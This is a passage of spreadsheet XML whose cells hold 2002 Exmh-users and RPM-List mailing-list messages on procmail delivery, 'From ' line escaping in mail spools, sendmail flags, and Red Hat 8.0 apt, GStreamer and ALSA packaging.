--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; &gt; &gt; 
&gt; &gt; &gt;   Dag&gt; but when procmail runs it it doesn't, presumably as it
&gt; &gt; &gt;   Dag&gt; doesn't have the authorization to communicate with the
&gt; &gt; &gt;   Dag&gt; laptop, beeing another user?
&gt; &gt; &gt; 
&gt; &gt; &gt; I don't know anything about the KDE sound server but I'd guess 
&gt; &gt; &gt; your problem is the "environment" in which procmail runs.  You 
&gt; &gt; &gt; don't say what procmail is running from.  In my case, for 
&gt; &gt; &gt; example, procmail is run from fetchmail which is run by a cron 
&gt; &gt; &gt; job.
&gt; &gt; 
&gt; &gt; Sorry about that,
&gt; &gt; procmail is run by the qmail delivery agent to presort all mail
&gt; &gt; I get.
&gt; &gt; But anyway, I found an error message in procmail.log, which solved
&gt; &gt; the problem.
&gt; &gt; The following line in my delivery script seems to work fine now:
&gt; &gt; 
&gt; &gt; DISPLAY=:0.0 artsplay 
&gt; 
&gt; BTW, if you use exmhwrapper (found in the misc directory), you can generalize 
&gt; this to
&gt; 
&gt; DISPLAY=`cat $HOME/.exmh/.display` artsplay Yes, but that probably means that you have to have exmh
running on the laptop to get the notification?
With exmh getting upset by two instances running at the
same time, this creates the problem that I cannot  run to the
closest compter to check out the new mail.But thanks for the hint, I might use that for some other
hack ;-)BRGDSDag_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
When I receive a message that has a line starting with "From ", it's
broken into two messages.  I get my mail from /var/spool/mail.  The
program that incorporates mail thinks that the "From " line starts a new
message.My sysadmins have told me that the sending mail client is supposed to 
escape lines begining with "From ".  EXMH (2.5) doesn't do this.  Should 
it?  It appears that my MH is MH 6.8.  Does NMH fix this?Jason D. M. Rennie
MIT AI Lab
jrennie@ai.mit.edu
(617) 253-5339
http://www.ai.mit.edu/~jrennie/
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">This is not an exmh problem, but an interaction between sendmail, Solaris and 
mh.Your sysadmin is wrong.  It is the responsibility of the receiving mail 
server to escape lines beginning with "From " if they choose to turn on that 
facility.  It is not the responsibility for email clients to cater to the 
stupid design of the unix mail spool, and Sun's even more stupid decision to 
rely on "Content-length:" instead of dealing with this problem.  Since mh is 
unaware of "Content-length:", rcvstore gags trying to parse messages from the 
spool.I had this same problem.  There are several ways to fix it:1)  Get your mail administrator to add the "E" flag to your sendmail.  This 
means you will never see a line beginning with "From ".  Any such line will 
look like "&gt;From ".2)  There is a patch to mh to make it respect "Content-length:".  When I was 
having this problem, porting this patch to nmh was low on the priority list, 
then nmh development stalled for a long time.  I doubt it has been done, but 
you can check with the nmh list at nmh-workers@mhost.com to find out for sure.3)  You can learn to use procmail, invoking rcvstore directly instead of 
letting sendmail put your incoming mail into the spool.  This avoids the 
whole issue.  rcvstore only deals with a single message at a time, and 
everything works.
-- 
Jim McMaster
mailto:mcmasjc@tatanka.stortek.com
In message &lt;200210091657.g99GvDmX025433@life.ai.mit.edu&gt;, Jason Rennie said:
&gt; 
&gt; When I receive a message that has a line starting with "From ", it's
&gt; broken into two messages.  I get my mail from /var/spool/mail.  The
&gt; program that incorporates mail thinks that the "From " line starts a new
&gt; message.
&gt; 
&gt; My sysadmins have told me that the sending mail client is supposed to 
&gt; escape lines begining with "From ".  EXMH (2.5) doesn't do this.  Should 
&gt; it?  It appears that my MH is MH 6.8.  Does NMH fix this?
&gt; 
&gt; Jason D. M. Rennie
&gt; MIT AI Lab
&gt; jrennie@ai.mit.edu
&gt; (617) 253-5339
&gt; http://www.ai.mit.edu/~jrennie/
&gt; 
&gt; 
&gt; 
&gt; 
&gt; _______________________________________________
&gt; Exmh-users mailing list
&gt; Exmh-users@redhat.com
&gt; https://listman.redhat.com/mailman/listinfo/exmh-users
&gt; 
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; On Wed, 9 Oct 2002, "Jason" == Jason Rennie wrote:  Jason&gt; My sysadmins have told me that the sending mail client
  Jason&gt; is supposed to escape lines begining with "From ".Your sysadmins are wrong.Whatever program that is used to store the mail into the 
braindead "mailbox" file (/var/spool/mail/whatever) is supposed 
to escape a line that begins with From.  That program is called 
the local Mail Delivery Agent (MDA)It would be better if you never, ever, stored your mail in a 
"mailbox" file.If your sysadmins are capable of it, get them to set up the 
receiving Mail Transfer Agent (MTA) to allow the use of procmail 
as the local MDA.  Then use procmail to invoke rcvstore and 
deliver your mail directly into your MH mail folders.Most Linux systems come configured this way, if a user has a
$HOME/.procmail file then mail is delivered using procmail.
--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">James&gt; This is not an exmh problem, but an interaction between sendmail,
James&gt; Solaris and mh.Correct.James&gt;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spool.Also correct.  In fairness, though I cannot defend the Content-Length: header
as I consider it brain damage in the extreme, Sun inherited this from AT&amp;T.James&gt; Get your mail administrator to add the "E" flag to your sendmail.
James&gt; This means you will never see a line beginning with "From ". Any such
James&gt; line will look like "&gt;From ".Specifically, you will need to find a line in /etc/mail/sendmail.cf that
starts with "Mlocal" such as:[4784]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file:MODIFY_MAILER_FLAGS(`LOCAL', `+E')dnlJames&gt; You can learn to use procmail, invoking rcvstore directly instead of 
James&gt; letting sendmail put your incoming mail into the spool.  This avoids
James&gt; the whole issue.  rcvstore only deals with a single message at a time,
James&gt; and everything works.Also correct, though procmail per se is not needed, as other filters (such
as slocal, which is part of the [n]mh distribution) do the trick just as well.-- John_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
mcmasjc@tatanka.stortek.com said:
&gt; 3)  You can learn to use procmail,Can this be done via .forward?  I don't have root on the machine my
mailbox is on, and I'm absolutely certain that a complaint to the sysadmin
about sendmail will get a simple response: shut down the daemon and tell
me to use Outlook. :(--
73 de ke9tv/2, Kevin KENNY   GE Corporate Research &amp; Development
kennykb@crd.ge.com           P. O. Box 8, Bldg. K-1, Rm. 5B36A
                             Schenectady, New York 12301-0008 USA_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">In message &lt;200210091843.OAA01268@hippolyta.crd.ge.com&gt;, Kevin Kenny said:
&gt; 
&gt; mcmasjc@tatanka.stortek.com said:
&gt; &gt; 3)  You can learn to use procmail,
&gt; 
It absolutely can be done from .forward.  I am in the same situation as you, 
and that is how I do it.
-- 
Jim McMaster
mailto:mcmasjc@tatanka.stortek.com
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">In message &lt;200210091925.g99JPGfJ001534@fsck.intern.waldner.priv.at&gt;, Robert 
Wa
ldner said:
&gt; 
&gt; 
&gt; On Wed, 09 Oct 2002 14:43:32 EDT, Kevin Kenny writes:
&gt; &gt;&gt; 3)  You can learn to use procmail,
&gt; 
&gt; &gt;Can this be done via .forward?
&gt; 
&gt; make your .forward contain only the following line:
&gt; "|/usr/bin/procmail"
&gt;  (incl. the quotes, your procmail binary may be in another path)
&gt; 
Check the procmail documentation.  They actually recommend:"|IFS=' '&amp;&amp;p=(PATH/TO/PROCMAIL)&amp;&amp;test -f $p&amp;&amp;exec $p -f-||exit 
75#(UNIQUE_STRING)"I don't know what this does, but it is explained in the doc.
-- 
Jim McMaster
mailto:mcmasjc@tatanka.stortek.com_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 23 Sep 2002 17:41:20 +0200
Matthias Saou  wrote:# So did my build if the original source is what you were mentioning
# ;-) One drawback : They changed from pspell to aspell apparently,
# and it requires aspell &gt;= 0.50 which isn't even in Rawhide, so spell
# checking is disabled for now until I take a decision about it :-/OOps, I didn't see the webpage get updated.  I saw the new claws, and
checked your site, forgot about it for half a day and then posted
here.  You beat me once again! # If I build recent aspell packages, they may not be upgraded when
# ungrating to the next Red Hat Linux release (the final version of
# the limbos and(null) betas), which is maybe not really desired. I'll
# probably test and see...Oh yeah, I was following this thread in the sylpheed-claws list.  Very
interesting stuff.  I might have to stick w/ 0.8.2 until aspell gets
updated in Red Hat.-- 
Jesse Keating
j2Solutions.net
Mondo DevTeam (www.mondorescue.org)Was I helpful?  Let others know:
 http://svcs.affero.net/rm.php?r=jkeating_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Jesse wrote :&gt; On Fri, 20 Sep 2002 10:40:55 +0200
&gt; Matthias Saou  wrote:
&gt; 
&gt; # But as it's the primary mailer I use, you can be sure that as soon
&gt; # as it's updated to 0.8.3, I'll update my build! :-)
&gt; 
&gt; It got updated (;So did my build if the original source is what you were mentioning ;-)
One drawback : They changed from pspell to aspell apparently, and it
requires aspell &gt;= 0.50 which isn't even in Rawhide, so spell checking is
disabled for now until I take a decision about it :-/If I build recent aspell packages, they may not be upgraded when ungrating
to the next Red Hat Linux release (the final version of the limbos and
(null) betas), which is maybe not really desired. I'll probably test and
see...MatthiasPS: The spec file was massively updated and the --with / --without options
that can be used to rebuild the source packages are now listed in the
description ;-)--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</si>
  <si>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Once upon a time, Jesse wrote :&gt; Oh yeah, I was following this thread in the sylpheed-claws list.  Very
&gt; interesting stuff.  I might have to stick w/ 0.8.2 until aspell gets
&gt; updated in Red Hat.Then this may be 6 months or more since my guess after 3 beta releases is
that the freeze on package versions for inclusion in the next stable
release (n+1) has already happened, thus you'll have to wait at least for
Red Hat Linux... n+2 :-)This is why (if it doesn't break anything), I'll maybe release recent
aspell packages. But to be sure I'll need to do some testing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</si>
  <si>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Hi,First you have to get the win32 files !!!
then , you configure using  --enable_win32 On Fri, 2002-09-20 at 13:11, Axel Thimm wrote:
&gt; Hi,
&gt; 
&gt; has anyone an answer for me? The mplayer documentation still suggests to use
&gt; them for x86 architectures.
&gt; 
&gt; Thanks. :)
&gt; 
&gt; Regards, Axel.
&gt; 
&gt; On Sat, Jun 08, 2002 at 11:39:03PM +0200, Axel Thimm wrote:
&gt; &gt; Are there perhaps licensing issues, which forbid such a practice? Or any other
&gt; &gt; reasons?
&gt; &gt; 
&gt; &gt; The reason I ask is that I have seen performance and also some feature
&gt; &gt; differences (fullscreen w/o keeping aspect ratio, visual artifacts on NVIDIA)
&gt; &gt; comparing with or without the Win32 codecs. The mplayer authors seem to
&gt; &gt; recommend using them for x86 architectures.
&gt; &gt; 
&gt; &gt; Beware, I am no mplayer/codecs/whatever expert, I may be totally lost ...
&gt; 
&gt; -- 
&gt; Axel.Thimm@physik.fu-berlin.de
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt; _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi folks, I just uploaded RPMS of the new netatalk 1.5.5 released 
yesterday, thought folks here might be interested.  This release fixes a 
nastygram in saving files via Illustrator that I personally have been 
waiting for....   http://ftp.falsehope.com/home/tengel/netatalk/(will be mirrored on rpmfind.net by tomorrow, usually).-te-- 
Troy Engel, Systems Engineer
Cool as the other side of the pillow
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,I'm new to the list.
I wanted to find out who tried recompiling a working apt rpm for (null) or 
psyche.  I would like to get good GStreamer packages done by monday when 
it's released.BTW, in the archive I saw some posts regarding the GStreamer repository.  
I'm not sure why they were posted on this list ;) In any case, I'm the rpm 
maintainer, so if you have any questions, feel free to ask.I was trying to get an updated apt rpm from http://dave.cridland.net/, but 
the http port is closed.  Dave, if you're reading this, please let me know 
where I can get the updated rpm.Thanks,
Thomas-- The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
&lt;-*-                      -*-&gt;
Just like you said
you leave my life
I'm better off dead
&lt;-*- thomas@apestaart.org -*-&gt;
URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Thomas wrote :&gt; I wanted to find out who tried recompiling a working apt rpm for (null)
&gt; or psyche.  I would like to get good GStreamer packages done by monday
&gt; when it's released.I have a working apt 0.5.4cnc7 package for Red Hat Linux 8.0. It will be
available at the same second the distribution will, and so will a complete
apt repository already including quite a few of my packages updated for Red
Hat Linux 8.0.I didn't want to say all this before Monday, but as the new release already
leaked from many places, and official statements made about it, it
shouldn't be a big deal :-/I'll keep you all posted on Monday! They'll even be a big apt-related
surprise!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</si>
  <si>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Hi,Red Hat 8.0 is released tomorrow (monday).  I took some time out to make 
RPMs of GStreamer for it.All of them (core, plugins and player) have been uploaded to the apt 
repository in a new "redhat-80-i386" directory.The repository for dependencies is again called "deps", and the one for 
the gstreamer rpms is "redhat", because this time around the base distro 
contains all the necessary packages.A screenshot of Red Hat 8.0 running gst-player is up at
http://thomas.apestaart.org/download/screenshots/redhat-80-gst-player.png
Here are some known issues with the resulting rpms :a) gstreamer-nautilus isn't built, the package got renamed and I don't 
have a -devel package for it yetb) the c++ plugins have problems which I haven't been able to resolve.
Here are the errors:INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
/usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin 
/usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0: 
undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoEPlugin /usr/lib/gst/libgstwincodec.so failed to load
DEBUG(15299: 0)gst_plugin_load_plugin:161: attempt to load plugin 
"/usr/lib/gst/libgstmodplug.so"
INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
/usr/lib/gst/libgstmodplug.so failed to load: Error loading plugin 
/usr/lib/gst/libgstmodplug.so, reason: /usr/lib/gst/libgstmodplug.so: 
undefined symbol: __gxx_personality_v0I'm not sure how to fix this; running strings on the libs in /usr/lib 
reveals that there are other libs that have these symbols, so there must 
be something straightforward that should fix this.
If anyone has a suggestion, please share ;)Thomas-- The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
&lt;-*-                      -*-&gt;
Kiss me please kiss me
Kiss me out of desire baby not consolation
Oh you know it makes me so angry cause I know that in time
I'll only make you cry
&lt;-*- thomas@apestaart.org -*-&gt;
URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,&gt; On Sun, 29 Sep 2002, Thomas Vander Stichele wrote:
&gt; 
&gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
&gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin 
&gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0: 
&gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE&gt; Are you using the same version of GCC to compile the plugin as its C++
&gt; dependencies?Yes, I am.  Everything is built inside a chroot.  I think it isn't linking 
to a lib somewhere, I'm just not sure what lib it should preloading here.  
Anyway to find out which one it is ?Thomas -- The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
&lt;-*-                      -*-&gt;
You came in just like smoke
With a little come on come on 
come on in your walk
come on
&lt;-*- thomas@apestaart.org -*-&gt;
URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Thomas wrote :&gt; &gt; On Sun, 29 Sep 2002, Thomas Vander Stichele wrote:
&gt; &gt; 
&gt; &gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
&gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin 
&gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0:
&gt; &gt; &gt; 
&gt; &gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE
&gt; 
&gt; &gt; Are you using the same version of GCC to compile the plugin as its C++
&gt; &gt; dependencies?
&gt; 
&gt; Yes, I am.  Everything is built inside a chroot.  I think it isn't
&gt; linking to a lib somewhere, I'm just not sure what lib it should
&gt; preloading here.  Anyway to find out which one it is ?Looks like a problem with the avifile you've rebuilt... I've been unable to
recompile successfully the latest version on 8.0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</si>
  <si>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&gt; &gt; &gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
&gt; &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin 
&gt; &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0:
&gt; &gt; &gt; &gt; 
&gt; &gt; &gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE
&gt; &gt; 
&gt; &gt; &gt; Are you using the same version of GCC to compile the plugin as its C++
&gt; &gt; &gt; dependencies?
&gt; &gt; 
&gt; &gt; Yes, I am.  Everything is built inside a chroot.  I think it isn't
&gt; &gt; linking to a lib somewhere, I'm just not sure what lib it should
&gt; &gt; preloading here.  Anyway to find out which one it is ?
&gt; 
&gt; Looks like a problem with the avifile you've rebuilt... I've been unable to
&gt; recompile successfully the latest version on 8.0 :-/Hm, it is built inside the same chroot.  aviplay works (well it would if I 
had XV, I get X errors ;)).  But it doesn't complain about linker 
problems.  So I suppose my avifile library on itself is compiled ok.Sigh, avifile is one of the worst packages out there, in all aspects - 
naming of tarballs, not ever releasing an actual package, versioning of 
libraries, API stability, ...Thomas -- The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
&lt;-*-                      -*-&gt;
cos when i needed someone
you left me floored
the feeling is gone
i can't let go
you know that i'd change if i had the love it takes
&lt;-*- thomas@apestaart.org -*-&gt;
URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Peter Peltonen (peter.peltonen@iki.fi) wrote*:
&gt;BTW: I just a found a quite nice looking apt repositry for
&gt;all kinds of audio apps at
&gt;
&gt;http://ccrma-www.stanford.edu/planetccrma/software/
&gt;_Very_ comprehensive audio app collection, Thanks.--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias,On Mon, Sep 30, 2002 at 09:28:26AM +0200, Matthias Saou wrote:
&gt; All freshrpms.net is now set for the imminent release of Red Hat Linux 8.0.thanks a lot for all your effords! It is just great!&gt; I'll probably post to the list once I open up ftp.freshrpms.net so you can
&gt; be the first ones to get in and download, although I doubt you'll have
&gt; trouble finding access to at least one fast mirror using my mirror list.You mean the mirror list for RH8.0, or do there exist mirrors for your apt
repo?On Sat, Sep 28, 2002 at 06:37:54PM +0200, Matthias Saou wrote: 
&gt; I'll keep you all posted on Monday! They'll even be a big apt-related 
&gt; surprise! ;-)))) Was this the surprise, or will there be even more (where are my heart pills)? ;)Thanks Matthias!
-- 
Axel.Thimm@physik.fu-berlin.de_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Indeed - I was thinking of getting back into doing mods - nice to see an 
apt-get'able soundtracker there :-)Anyone know where to get a good selection of samples/loops?--On Monday, September 30, 2002 07:14:31 +0000 Angles Puglisi 
 wrote:&gt; _Very_ comprehensive audio app collection, Thanks.                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I would appreciate it if you could get Gabber packages for Red Hat 8. I 
will be making a new release soon, but even in the meantime, 0.8.7 
packages would be ok.I know that in the beta, red hat was using a modified version of 
gnome-libs which is incompatible with the latest gnomemm. If this is 
still the case in 8, I can send you a patch which makes gnomemm work 
again...JulianOn Monday, Sep 30, 2002, at 03:28 US/Eastern, Matthias Saou wrote:&gt; Hi all,
&gt;
&gt; All freshrpms.net is now set for the imminent release of Red Hat Linux 
&gt; 8.0.
&gt; The whole release process is a lot less secret as usual since there 
&gt; have
&gt; been some leaks, including a mirror purposely wide open :-(
&gt;
&gt; See this article about the release and the leaks :
&gt; http://news.com.com/2100-1001-959434.html?tag=fd_top
&gt;
&gt; As it's no secret anymore, the files will be available today (morning 
&gt; for
&gt; you Americans, afternoon for us Europeans), and to go with them, there 
&gt; are
&gt; already quite a few freshrpms.net packages ready!
&gt;
&gt; Mirror list for download (they're not open yet) :
&gt; http://freshrpms.net/mirrors/psyche.html
&gt;
&gt; New freshrpms.net package list :
&gt; http://psyche.freshrpms.net/
&gt;
&gt; Of course, apt is also available (now version 0.5.4!) and fully 
&gt; tested. If
&gt; you like apt for your desktop machines, I also recommend checking out 
&gt; the
&gt; new "synaptic" package as it has now been ported to gtk+ and blends
&gt; perfectly into the distribution!
&gt;
&gt; I'll probably post to the list once I open up ftp.freshrpms.net so you 
&gt; can
&gt; be the first ones to get in and download, although I doubt you'll have
&gt; trouble finding access to at least one fast mirror using my mirror 
&gt; list.
&gt;
&gt; Have fun with Psyche!
&gt; Matthias
&gt;
&gt; -- 
&gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
&gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
&gt; Load : 0.16 0.18 0.17
&gt;
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.Are there any reasons _not_ to use the new apt releases on RH 7.x?-- 
reiserfsck ist bekannt dafÃ¼r, daÃŸ es leere Dateisysteme zurÃ¼cklÃ¤ÃŸt.
Gut, formaljuristisch hat er das Dateisystem in einen wohldefinierten
Zustand versetzt, aber ... nunja.  Man erwartet schon irgendwie, daÃŸ
noch ein paar Daten drauf sind danach.      -- Felix v. Leitner, dasr_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Hesty wrote :&gt; I know they're all included in the freshrpms alsa-null
&gt; directory.Now that Psyche is released, that directory was erased.&gt; I was worried that with the new mplayer-pre8, these
&gt; packages might break something. Is there any mplayer
&gt; package which includes all the options for -vo and
&gt; -ao? Is that because alsa is not included in RH, hence
&gt; the lack of alsa option for mplayer from freshrpms?
&gt; Or is there some swtiches to enable these options
&gt; during 
&gt; rpm build?For all my recent packages that support --with and --without options, I've
put them in the %description section. See for instance :
http://psyche.freshrpms.net/rpm.html?id=80Where you can see :
Available rpmbuild rebuild options :
--with : alsa
--without : aalib lirc libdv artsThe ogle package has also a --with alsa option, and I've had a bug report
about xine that I apparently unintentionally compiled with ALSA directly
:-/I'd like to aks this on the rpm-zzzlist : Would a new dependency of 250k, the
alsa-lib package, for many packages (mplayer, ogle, xine) be a problem for
the freshrpms.net packages users? As I really feel like blending ALSA in
now, especially since I've just spent some time recompiling alsa-kernel
package for all the Psyche kernels!!!Matthias--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</si>
  <si>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Once upon a time, Ralf wrote :&gt; Are there any reasons _not_ to use the new apt releases on RH 7.x?Hmmm... I don't see any :-)My main concern is that when rebuilding the recent packages I've made for
Psyche on Valhalla, I'd need to lower the "Release:" tag (to keep an
upgrade working), and that would f*ck up my CVS repository which is on my
Valhalla box (well, I'm exagerating, It'll just make it more difficult for
me) ;-)
Sure, there are easy ways around this, but the easiest for me will be to
wait until I upgrade my main box to Psyche and have Valhalla only on a
secondary rebuild system.Matthias--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</si>
  <si>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Hi.Matthias Saou  wrote:
&gt; My main concern is that when rebuilding the recent packages I've made
&gt; for Psyche on Valhalla, I'd need to lower the "Release:" tag (to keep an
&gt; upgrade working), and that would f*ck up my CVS repository which is on
&gt; my Valhalla boxSorry, I don't get it. What's wrong with a release tag of fr1?-- 
Do I look like a freakin' people person?_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
&gt; 
&gt; I'd like to aks this on the rpm-zzzlist : Would a new dependency of 250k, the
&gt; alsa-lib package, for many packages (mplayer, ogle, xine) be a problem for
&gt; the freshrpms.net packages users? As I really feel like blending ALSA in
&gt; now, especially since I've just spent some time recompiling alsa-kernel
&gt; package for all the Psyche kernels!!!I don't know a lot about ALSA, but use custom kernels for many of the 
machines -- would this mean, in order to get mplayer (eg) to work, I'd 
first have to compile a custom kernel option? or kernel module? Since I 
wouldn't have your alsa-kernel(??) installed, would that mean alsa-libs 
and so on won't install?(I guess, in short, if it *requires* the shipped kernel to be used, I'd 
be against --with-alsa as a default?)-te-- 
Troy Engel, Systems Engineer
Cool as the other side of the pillow
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Hesty wrote :&gt; &gt; Where you can see :
&gt; &gt; Available rpmbuild rebuild options :
&gt; &gt; --with : alsa
&gt; &gt; --without : aalib lirc libdv arts
&gt; 
&gt; Does this mean when rebuilding the package, I'll
&gt; simply
&gt; type: 
&gt; &gt; rpmbuild --rebuild .src.rpm --with alsa ?Yes it does. And if you're missing the dependencies needed for the selected
options, you'll even be informed! (for ALSA, you'll need alsa-lib-devel for
example)&gt; &gt; I'd like to aks this on the rpm-zzzlist : Would a new
&gt; &gt; dependency of 250k, the
&gt; &gt; alsa-lib package, for many packages (mplayer, ogle,
&gt; &gt; xine) be a problem for
&gt; &gt; the freshrpms.net packages users? As I really feel
&gt; &gt; like blending ALSA in
&gt; &gt; now, especially since I've just spent some time
&gt; &gt; recompiling alsa-kernel
&gt; &gt; package for all the Psyche kernels!!!
&gt; &gt; 
&gt; 
&gt; I'll have no problem at all with this and you get my
&gt; vote on this one. 
&gt; 
&gt; One problem with alsa-kernel that I've experienced:
&gt; everytime RH issues a new kernel update, I have to
&gt; rebuild my alsa-kernel to match the new kernel.Yup... unfortunately the alsa-kernel needs to be rebuilt for each kernel,
and there's no way of avoiding it.Matthias--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</si>
  <si>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Hi.Matthias Saou  wrote:&gt; repository... and there's where the problem will be : It will say that
&gt; there are two synaptic-0.24-fr1 packages (one installed, the other
&gt; available) with the same version but different dependencies :-/
&gt; That's why I always keep package versions lower for older distributions.Ah, now I see. This is a non-issue here, so I'll rebuild locally :)-- 
Dog for sale: eats anything and is fond of children._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ralf wrote :&gt; Matthias Saou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</si>
  <si>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Is it possible to use new apt to do (null) to RH8 upgrade?Even if it's possible, are there good reasons why maybe I should not do it and
just use the RH iso's (I don't think RH8 will upgrade from (null), maybe up2date
will)?--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Is it possible to use new apt to do (null) to RH8 upgrade?It might be, don't think anyone tried it yet.&gt; Even if it's possible, are there good reasons why maybe I should not do it and
&gt; just use the RH iso's (I don't think RH8 will upgrade from (null), maybe up2date
&gt; will)?Yes ;)first off, redhat does not support upgrading from beta's to the released 
version.  That doesn't mean it can't work, it means nobody tried it, they 
sure didn't test it or fix anything to make it work, and you're on your 
own.second, historically a new .0 numbers mostly means "so much has been 
changed that you might have problems upgrading from any previous release 
anyway".  So, historically, most users installing a .0 release do this 
from scratch anyway, doing upgrades throughout x.0-&gt;x.y.If you want to avoid problems, bite the bullet and reinstall ;)Thomas -- The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
&lt;-*-                      -*-&gt;
And every time she sneezes
I think it's love and oh lord
I'm not ready for this sort of thing
&lt;-*- thomas@apestaart.org -*-&gt;
URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I remember apt-get dist-upgrading from 7.2 to 7.3 fine, so it -should- 
work, maybe :)--On Tuesday, October 01, 2002 10:27:47 +0200 Thomas Vander Stichele 
 wrote:&gt; It might be, don't think anyone tried it yet.                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
